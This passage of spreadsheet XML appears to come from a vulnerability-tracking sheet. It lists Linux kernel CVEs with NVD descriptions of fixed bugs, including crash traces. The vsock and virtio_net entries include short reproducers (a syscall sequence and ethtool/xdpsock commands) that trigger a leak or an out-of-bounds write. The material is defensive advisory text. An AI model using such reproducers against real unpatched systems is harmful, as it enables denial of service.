        </is>
      </c>
      <c r="Q505" s="5" t="inlineStr"/>
      <c r="R505" s="5" t="inlineStr"/>
      <c r="S505" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86: hp-bioscfg: fix password encoding bounds check
The password PSWD_ENCODINGS parser reads password_obj[elem + pos_values]
while copying the supported password encodings from the ACPI package.
The outer loop only guarantees that elem is within password_obj_count.
The encoding count is bounded by MAX_ENCODINGS_SIZE, but that does not
guarantee that the ACPI package contains enough entries for all
elem + pos_values accesses.
A malformed package can therefore declare a non-zero encoding count
without providing enough string objects, causing the parser to read past
the ACPI package array and pass an out-of-bounds string pointer and
length to hp_convert_hexstr_to_str().
Add the same computed-index bounds check used by the other offset-based
package parsing loops before reading password_obj[elem + pos_values].</t>
        </is>
      </c>
      <c r="T505" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90137</t>
        </is>
      </c>
    </row>
    <row r="506">
      <c r="A506" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B506" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C506" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90138</t>
        </is>
      </c>
      <c r="D506" s="5" t="inlineStr"/>
      <c r="E506" s="5" t="inlineStr"/>
      <c r="F506" s="5" t="inlineStr"/>
      <c r="G506" s="5" t="inlineStr"/>
      <c r="H506" s="5" t="inlineStr"/>
      <c r="I506" s="5" t="inlineStr"/>
      <c r="J506" s="5" t="inlineStr"/>
      <c r="K506" s="5" t="inlineStr"/>
      <c r="L506" s="5" t="inlineStr"/>
      <c r="M506" s="5" t="inlineStr"/>
      <c r="N506" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O506" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P506" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q506" s="5" t="inlineStr"/>
      <c r="R506" s="5" t="inlineStr"/>
      <c r="S506" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vsock: don't check the listener's sk_err in vsock_accept()
Syzbot reported an issue which can be reproduced with these steps:
	r0 = socket(AF_VSOCK, SOCK_STREAM, 0)
	bind(r0, {VMADDR_CID_ANY, PORT})
	connect(r0, {VMADDR_CID_LOCAL, PORT}) -&gt; -1, EPROTO (self-connect)
	listen(r0, backlog)                   -&gt; 0
	r1 = socket(AF_VSOCK, SOCK_STREAM, 0)
	connect(r1, {VMADDR_CID_LOCAL, PORT}) -&gt; 0
	accept(r0)                            -&gt; -1, EPROTO (stale sk_err)
Basically, it creates a socket (r0) and triggers a self-connect after
binding it. This self-connect fails with EPROTO because it loops back
to r0 while the socket is still in the TCP_SYN_SENT state, causing it
to be incorrectly dispatched to the connecting-client path. The
unexpected packet type encountered there sets sk_err to EPROTO.
After that, it invokes a listen() call on the same socket. This
listen() call succeeds because the kernel's listening path never
inspects or clears sk_err. Then, a new socket (r1) is created as a
normal client and connects to r0. However, vsock_accept() rejects this
incoming connection because the listener's sk_err still holds the
EPROTO error from the earlier failed self-connect.
This rejection causes the child socket created for r1's connection to
never be freed on virtio or hyperv transports; only the VMCI transport
implements pending_work to revisit and clean up a rejected socket.
For a non-blocking connect(), vsock_connect() may return -EINPROGRESS
immediately, and vsock_connect_timeout() can later set sk-&gt;sk_err
asynchronously.
Since no vsock transport ever sets sk_err on a socket while it is in
TCP_LISTEN state, checking it in vsock_accept() serves no purpose and
only carries forward errors left behind by earlier, unrelated
connection attempts on the same socket. Remove the checks so accept()
no longer rejects valid incoming connections because of a stale
error, which also avoids the resource leak described above.</t>
        </is>
      </c>
      <c r="T506" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90138</t>
        </is>
      </c>
    </row>
    <row r="507">
      <c r="A507" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B507" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C507" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90139</t>
        </is>
      </c>
      <c r="D507" s="5" t="inlineStr"/>
      <c r="E507" s="5" t="inlineStr"/>
      <c r="F507" s="5" t="inlineStr"/>
      <c r="G507" s="5" t="inlineStr"/>
      <c r="H507" s="5" t="inlineStr"/>
      <c r="I507" s="5" t="inlineStr"/>
      <c r="J507" s="5" t="inlineStr"/>
      <c r="K507" s="5" t="inlineStr"/>
      <c r="L507" s="5" t="inlineStr"/>
      <c r="M507" s="5" t="inlineStr"/>
      <c r="N507" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O507" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P507" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q507" s="5" t="inlineStr"/>
      <c r="R507" s="5" t="inlineStr"/>
      <c r="S507" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fuse: check for NULL root inode in fuse_fill_super_submount
fuse_iget() can return NULL when its inode allocation fails, but
fuse_fill_super_submount() passed the result straight to get_fuse_inode()
and decremented fi-&gt;nlookup without checking it:
        root = fuse_iget(sb, parent_fi-&gt;nodeid, ...);
        fi = get_fuse_inode(root);
        fi-&gt;nlookup--;
Inside fuse_iget() the inode allocation can fail and return NULL.  The
submount root takes the iget5_locked() path, whose alloc_inode() can fail
under memory pressure (the auto-submount branch can fail the same way in
new_inode() or fuse_alloc_submount_lookup()):
        inode = iget5_locked(sb, nodeid, fuse_inode_eq, fuse_inode_set,
                             &amp;nodeid);
        if (!inode)
                return NULL;
A NULL root makes get_fuse_inode() a container_of() on NULL and the
nlookup decrement a write to a bogus address, oopsing the mount.  With
CONFIG_KASAN the following null pointer dereference is reported when the
root inode allocation of an auto-submount fails (e.g. under memory
pressure):
==================================================================
BUG: KASAN: null-ptr-deref in fuse_get_tree_submount+0x656/0x8b0
Read of size 8 at addr 00000000000002b0 by task ls/942
CPU: 0 PID: 942 Comm: ls Tainted: G W 6.6 #15
Call Trace:
 &lt;TASK&gt;
 fuse_get_tree_submount+0x656/0x8b0
 vfs_get_tree+0x48/0x140
 fc_mount+0x13/0x50
 fuse_dentry_automount+0x7a/0xb0
 __traverse_mounts+0xca/0x330
 step_into+0x339/0xac0
 path_lookupat+0xc5/0x2f0
 filename_lookup+0x163/0x2a0
 vfs_statx+0xd5/0x200
 do_statx+0x83/0xd0
 __x64_sys_statx+0xa0/0xc0
 do_syscall_64+0x37/0x90
 entry_SYSCALL_64_after_hwframe+0x78/0xe2
 &lt;/TASK&gt;
==================================================================
Return -ENOMEM instead; the caller tears down the partially built
superblock on error, matching the other error returns in this
function.</t>
        </is>
      </c>
      <c r="T507" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90139</t>
        </is>
      </c>
    </row>
    <row r="508">
      <c r="A508" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B508" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C508" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90140</t>
        </is>
      </c>
      <c r="D508" s="5" t="inlineStr"/>
      <c r="E508" s="5" t="inlineStr"/>
      <c r="F508" s="5" t="inlineStr"/>
      <c r="G508" s="5" t="inlineStr"/>
      <c r="H508" s="5" t="inlineStr"/>
      <c r="I508" s="5" t="inlineStr"/>
      <c r="J508" s="5" t="inlineStr"/>
      <c r="K508" s="5" t="inlineStr"/>
      <c r="L508" s="5" t="inlineStr"/>
      <c r="M508" s="5" t="inlineStr"/>
      <c r="N508" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O508" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P508" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q508" s="5" t="inlineStr"/>
      <c r="R508" s="5" t="inlineStr"/>
      <c r="S508" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cuse: wait for pending RCU callbacks on module exit
Since commit 053fc4f755ad ("fuse: fix UAF in rcu pathwalks"),
fuse_conn_put() frees the fuse_conn through call_rcu() rather than
synchronously.  For cuse, fc-&gt;release is cuse_fc_release(), which
lives in the cuse module.  If the module is removed before the RCU
grace period ends, the callback jumps into freed module memory:
      userspace / module unload      |        RCU softirq
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 close(/dev/cuse)                    |
  cuse_channel_release()             |
   fuse_dev_release()                |
    fuse_conn_put(fch-&gt;conn)         |
     call_rcu(delayed_release) ------+---&gt; callback queued
                                     |
 rmmod cuse                          |
  cuse_exit()                        |
   cuse_channel_destroy()            |
   ...                               |
   return                            |
                                     |
 &lt;module text freed&gt;                 |
                                     |  rcu_do_batch()
                                     |   delayed_release()
                                     |    fc-&gt;release()
                                     |     -&gt; cuse_fc_release()
                                     |        ^^^ freed text!
The freed module text is unmapped by vfree(), so the jump into the
stale callback triggers a page-fault Oops.  If the virtual address
is subsequently reused, the callback could execute unrelated code
(undefined behaviour).
Fix this by calling rcu_barrier() in cuse_exit() so that any pending
fuse_conn release callback completes before the module is removed.</t>
        </is>
      </c>
      <c r="T508" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90140</t>
        </is>
      </c>
    </row>
    <row r="509">
      <c r="A509" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B509" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C509" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90141</t>
        </is>
      </c>
      <c r="D509" s="5" t="inlineStr"/>
      <c r="E509" s="5" t="inlineStr"/>
      <c r="F509" s="5" t="inlineStr"/>
      <c r="G509" s="5" t="inlineStr"/>
      <c r="H509" s="5" t="inlineStr"/>
      <c r="I509" s="5" t="inlineStr"/>
      <c r="J509" s="5" t="inlineStr"/>
      <c r="K509" s="5" t="inlineStr"/>
      <c r="L509" s="5" t="inlineStr"/>
      <c r="M509" s="5" t="inlineStr"/>
      <c r="N509" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O509" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P509" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q509" s="5" t="inlineStr"/>
      <c r="R509" s="5" t="inlineStr"/>
      <c r="S509" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipvs: fix integer overflow in ftp helper port/address parsing
ip_vs_ftp_get_addrport() accumulates decimal digits into a __u16
(hport) and into unsigned char (p[]) without checking for overflow.
A crafted FTP PASV/EPSV response with an over-long port or address
octet wraps the value, so the helper configures the data connection
with a truncated port/address.
The netfilter conntrack FTP helper had the same defect, fixed in
commit 2b413fc689ba ("netfilter: nf_conntrack_ftp: avoid u16
overflows"). Apply the equivalent fix here: widen the port accumulator
to u32 and reject values above 65535, and reject address octets above
255.</t>
        </is>
      </c>
      <c r="T509" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90141</t>
        </is>
      </c>
    </row>
    <row r="510">
      <c r="A510" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B510" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C510" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90142</t>
        </is>
      </c>
      <c r="D510" s="5" t="inlineStr"/>
      <c r="E510" s="5" t="inlineStr"/>
      <c r="F510" s="5" t="inlineStr"/>
      <c r="G510" s="5" t="inlineStr"/>
      <c r="H510" s="5" t="inlineStr"/>
      <c r="I510" s="5" t="inlineStr"/>
      <c r="J510" s="5" t="inlineStr"/>
      <c r="K510" s="5" t="inlineStr"/>
      <c r="L510" s="5" t="inlineStr"/>
      <c r="M510" s="5" t="inlineStr"/>
      <c r="N510" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O510" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P510" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q510" s="5" t="inlineStr"/>
      <c r="R510" s="5" t="inlineStr"/>
      <c r="S510" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
virtio_net: Fix resize of the RX ring
When a AF_XDP socket is attached, the virtnet_rx_resize
should resize the rq-&gt;xsk_buffs XSK buffer array. Otherwise,
when the size grows, the virtnet_rx_resume() causes a write
past the end of the array. This is easily reproducable with
    ethtool -G ens3 rx 32
    ./xdpsock -i eth0 -q 0 -r -z &amp;
    ethtool -G eth0 rx 256</t>
        </is>
      </c>
      <c r="T510" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90142</t>
        </is>
      </c>
    </row>
    <row r="511">
      <c r="A511" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B511" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C511" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90143</t>
        </is>
      </c>
      <c r="D511" s="5" t="inlineStr"/>
      <c r="E511" s="5" t="inlineStr"/>
      <c r="F511" s="5" t="inlineStr"/>
      <c r="G511" s="5" t="inlineStr"/>
      <c r="H511" s="5" t="inlineStr"/>
      <c r="I511" s="5" t="inlineStr"/>
      <c r="J511" s="5" t="inlineStr"/>
      <c r="K511" s="5" t="inlineStr"/>
      <c r="L511" s="5" t="inlineStr"/>
      <c r="M511" s="5" t="inlineStr"/>
      <c r="N511" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O511" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P511" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q511" s="5" t="inlineStr"/>
      <c r="R511" s="5" t="inlineStr"/>
      <c r="S511" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: kcm: Hold RCU read lock while running BPF parser
kcm_parse_func_strparser() calls bpf_prog_run_pin_on_cpu() which
prevents CPU migration, but does not establish an RCU read-side
critical section. Consequently, BPF map operations can trigger
WARN_ON_ONCE(!bpf_rcu_lock_held()) when called from the KCM strparser
program.
Hold the RCU read lock while running the program.</t>
        </is>
      </c>
      <c r="T511" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90143</t>
        </is>
      </c>
    </row>
    <row r="512">
      <c r="A512" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B512" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C512" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90144</t>
        </is>
      </c>
      <c r="D512" s="5" t="inlineStr"/>
      <c r="E512" s="5" t="inlineStr"/>
      <c r="F512" s="5" t="inlineStr"/>
      <c r="G512" s="5" t="inlineStr"/>
      <c r="H512" s="5" t="inlineStr"/>
      <c r="I512" s="5" t="inlineStr"/>
      <c r="J512" s="5" t="inlineStr"/>
      <c r="K512" s="5" t="inlineStr"/>
      <c r="L512" s="5" t="inlineStr"/>
      <c r="M512" s="5" t="inlineStr"/>
      <c r="N512" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O512" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P512" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q512" s="5" t="inlineStr"/>
      <c r="R512" s="5" t="inlineStr"/>
      <c r="S512" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dpll: fix NULL deref in dpll_device_ops() during teardown race
When the last owner of a dpll device unregisters while a foreign driver
still holds a pin on it via dpll_pin_on_pin_register(), the dpll object
stays alive with an empty registration list. A pin notification queued
before the unregister (e.g. ice reacting to zl3073x_i2c removal) then
walks pin-&gt;dpll_refs into dpll_device_ops(), which trips the WARN_ON and
dereferences the missing registration. dpll_lock cannot help because the
notification work was queued before the unregistering driver took the
lock.
Treat the empty registration list as a legitimate transient state. Make
dpll_priv() and dpll_device_ops() return NULL in that case and make
every pin netlink path that resolves a device from a pin skip such
dplls. dpll_cmd_pin_get_one() picks a ref with a live registration and
returns -ENODEV when there is none, the pin dumpit skips such a pin
instead of aborting the dump, dpll_msg_add_pin_dplls() and the
frequency, esync, reference sync and phase adjust set paths skip dead
refs, and dpll_pin_parent_device_set() validates the parent with
dpll_device_get_by_id(). dpll_pin_register() is the last caller that
dereferenced the device ops without a check, so move its frequency
monitor validation under dpll_lock and tolerate a missing registration
there as well.
The empty registration list is equivalent to a cleared DPLL_REGISTERED
mark, both transitions happen under dpll_lock in dpll_device_register()
and dpll_device_unregister(). A pin notification for a pin whose dplls
are all gone is now dropped with -ENODEV instead of crashing, all
callers in the core ignore that return value.
 WARNING: drivers/dpll/dpll_core.c:1092 at dpll_device_ops+0x24/0x40,
 CPU#83: kworker/u576:3/23471
 Modules linked in: ... ice ... zl3073x_i2c(-) ... zl3073x ...
 Workqueue: ice_dpll_wq ice_dpll_pin_notify_work [ice]
 RIP: 0010:dpll_device_ops+0x24/0x40
 Call Trace:
  &lt;TASK&gt;
  dpll_cmd_pin_get_one+0x336/0x520
  dpll_pin_event_send+0x82/0x140
  dpll_pin_on_pin_unregister+0xbb/0x160
  ice_dpll_pin_notify_work+0x1bc/0x1f0 [ice]
  process_one_work+0x19e/0x370
  worker_thread+0x1a6/0x310
  kthread+0xe4/0x120
  ret_from_fork+0x1a1/0x270
  ret_from_fork_asm+0x1a/0x30
  &lt;/TASK&gt;
 ---[ end trace 0000000000000000 ]---
 BUG: kernel NULL pointer dereference, address: 0000000000000010
 #PF: supervisor read access in kernel mode
 #PF: error_code(0x0000) - not-present page</t>
        </is>
      </c>
      <c r="T512" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90144</t>
        </is>
      </c>
    </row>
    <row r="513">
      <c r="A513" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B513" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C513" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90145</t>
        </is>
      </c>
      <c r="D513" s="5" t="inlineStr"/>
      <c r="E513" s="5" t="inlineStr"/>
      <c r="F513" s="5" t="inlineStr"/>
      <c r="G513" s="5" t="inlineStr"/>
      <c r="H513" s="5" t="inlineStr"/>
      <c r="I513" s="5" t="inlineStr"/>
      <c r="J513" s="5" t="inlineStr"/>
      <c r="K513" s="5" t="inlineStr"/>
      <c r="L513" s="5" t="inlineStr"/>
      <c r="M513" s="5" t="inlineStr"/>
      <c r="N513" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O513" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P513" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q513" s="5" t="inlineStr"/>
      <c r="R513" s="5" t="inlineStr"/>
      <c r="S513" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
hinic3: Fix skb linearization mismatch and drop skb when skb_checksum_help() failed
Previously, hinic3_send_one_skb() cached the skb fragment count before
calling hinic3_tx_offload(). If hinic3_tx_csum() falls back to
skb_checksum_help() for unsupported tunnel packets, the skb may be
linearized. Continuing to build the TX descriptor with the stale
fragment count leads to a descriptor mismatch, which can trigger
out-of-bounds DMA reads or IOMMU faults.
Furthermore, the old code ignored the return value of skb_checksum_help(),
transmitting corrupted packets with incomplete checksums upon failure.
Fix this by:
1. Moving the hinic3_tx_offload() call before calculating 'num_sge' to
   ensure the correct fragment count is used if the SKB is linearized.
2. Propagating skb_checksum_help() errors and returning
   HINIC3_TX_OFFLOAD_INVALID to properly drop the skb.</t>
        </is>
      </c>
      <c r="T513" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90145</t>
        </is>
      </c>
    </row>
    <row r="514">
      <c r="A514" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B514" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C514" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90146</t>
        </is>
      </c>
      <c r="D514" s="5" t="inlineStr"/>
      <c r="E514" s="5" t="inlineStr"/>
      <c r="F514" s="5" t="inlineStr"/>
      <c r="G514" s="5" t="inlineStr"/>
      <c r="H514" s="5" t="inlineStr"/>
      <c r="I514" s="5" t="inlineStr"/>
      <c r="J514" s="5" t="inlineStr"/>
      <c r="K514" s="5" t="inlineStr"/>
      <c r="L514" s="5" t="inlineStr"/>
      <c r="M514" s="5" t="inlineStr"/>
      <c r="N514" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O514" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P514" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q514" s="5" t="inlineStr"/>
      <c r="R514" s="5" t="inlineStr"/>
      <c r="S514" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf, xdp: move offload check into dev_xdp_install()
bpf_xdp_link_update() calls dev_xdp_install() directly and skips
dev_xdp_attach(), so the checks in dev_xdp_attach() do not run. A user can
make an XDP link with a normal program and then swap in an offloaded or
device-bound program with BPF_LINK_UPDATE, which puts it on the software
path.
dev_xdp_install() is the one place all three paths go through:
"ip link set xdp" and BPF_LINK_CREATE reach it via dev_xdp_attach(), and
BPF_LINK_UPDATE calls it directly. So move the program checks (offloaded,
bound to another device, device-bound in generic mode, native vs generic,
DEVMAP and CPUMAP) there, and keep only the netlink-flag check
(XDP_FLAGS_UPDATE_IF_NOEXIST) in dev_xdp_attach().</t>
        </is>
      </c>
      <c r="T514" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90146</t>
        </is>
      </c>
    </row>
    <row r="515">
      <c r="A515" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B515" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C515" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90147</t>
        </is>
      </c>
      <c r="D515" s="5" t="inlineStr"/>
      <c r="E515" s="5" t="inlineStr"/>
      <c r="F515" s="5" t="inlineStr"/>
      <c r="G515" s="5" t="inlineStr"/>
      <c r="H515" s="5" t="inlineStr"/>
      <c r="I515" s="5" t="inlineStr"/>
      <c r="J515" s="5" t="inlineStr"/>
      <c r="K515" s="5" t="inlineStr"/>
      <c r="L515" s="5" t="inlineStr"/>
      <c r="M515" s="5" t="inlineStr"/>
      <c r="N515" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O515" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P515" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q515" s="5" t="inlineStr"/>
      <c r="R515" s="5" t="inlineStr"/>
      <c r="S515" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
clk: devres: fix cleanup in devm_clk_get_optional_enabled_with_rate()
devm_clk_get_optional_enabled_with_rate() registers its cleanup action
before setting the clock rate. If setting the rate fails, it attempts to
disable and unprepare a clock that was never enabled. This issue was
spotted while reviewing "rust: clk: add devres-managed clks" [1].
Register the cleanup action only after successfully preparing and enabling
the clock.
[1]: https://lore.kernel.org/rust-for-linux/20260706-clk-type-state-v5-3-67c5f326a16c@collabora.com</t>
        </is>
      </c>
      <c r="T515" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90147</t>
        </is>
      </c>
    </row>
    <row r="516">
      <c r="A516" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B516" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C516" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90148</t>
        </is>
      </c>
      <c r="D516" s="5" t="inlineStr"/>
      <c r="E516" s="5" t="inlineStr"/>
      <c r="F516" s="5" t="inlineStr"/>
      <c r="G516" s="5" t="inlineStr"/>
      <c r="H516" s="5" t="inlineStr"/>
      <c r="I516" s="5" t="inlineStr"/>
      <c r="J516" s="5" t="inlineStr"/>
      <c r="K516" s="5" t="inlineStr"/>
      <c r="L516" s="5" t="inlineStr"/>
      <c r="M516" s="5" t="inlineStr"/>
      <c r="N516" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O516" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P516" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q516" s="5" t="inlineStr"/>
      <c r="R516" s="5" t="inlineStr"/>
      <c r="S516" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSv4: Fix incorrect argument passed to nfs4_delete_lease() in nfs4_add_lease()
When nfs4_add_lease() races with a delegation return, it calls
nfs4_delete_lease() to clean up. Previously, it passed priv,
which can legitimately be NULL. Passing a NULL priv eventually
leads to a NULL pointer dereference in generic_setlease().</t>
        </is>
      </c>
      <c r="T516" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90148</t>
        </is>
      </c>
    </row>
    <row r="517">
      <c r="A517" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B517" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C517" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90149</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2026-09-17</t>
        </is>
      </c>
      <c r="P517" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q517" s="5" t="inlineStr"/>
      <c r="R517" s="5" t="inlineStr"/>
      <c r="S517" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
NFSv4/flexfiles: fix NULL dereference for NFSv4.0 data servers
flexfiles accepts NFSv4.0 data servers, but two NFSv4 code paths assume
the data server client has a session. Unlike NFSv4.1+, an NFSv4.0 client
has no session (clp-&gt;cl_session is NULL; it uses clp-&gt;cl_slot_tbl), so
I/O to a v4.0 flexfiles DS oopses:
  - nfs4_init_ds_session() dereferences clp-&gt;cl_session-&gt;session_state
    while seeding the DS lease. It also only seeds cl_lease_time when
    NFS4_SESSION_INITING is set; without a session that never happens, so
    cl_lease_time stays 0 and nfs4_renew_state() busy-loops, requeuing
    every 5 seconds. Seed the lease whenever there is no session and
    return before touching session state.
  - ff_layout_async_handle_error_v4() dereferences
    clp-&gt;cl_session-&gt;fc_slot_table on every DS I/O error. Fall back to the
    v4.0 transport slot table (clp-&gt;cl_slot_tbl) when there is no session.</t>
        </is>
      </c>
      <c r="T517" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90149</t>
        </is>
      </c>
    </row>
    <row r="518">
      <c r="A518" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B518" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C518" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90150</t>
        </is>
      </c>
      <c r="D518" s="5" t="inlineStr"/>
      <c r="E518" s="5" t="inlineStr"/>
      <c r="F518" s="5" t="inlineStr"/>
      <c r="G518" s="5" t="inlineStr"/>
      <c r="H518" s="5" t="inlineStr"/>
      <c r="I518" s="5" t="inlineStr"/>
      <c r="J518" s="5" t="inlineStr"/>
      <c r="K518" s="5" t="inlineStr"/>
      <c r="L518" s="5" t="inlineStr"/>
      <c r="M518" s="5" t="inlineStr"/>
      <c r="N518" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O518" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P518" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q518" s="5" t="inlineStr"/>
      <c r="R518" s="5" t="inlineStr"/>
      <c r="S518" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
pnfs/blocklayout: Fix device leaks on parse failure
bl_parse_concat() and bl_parse_stripe() allocate a child device array and
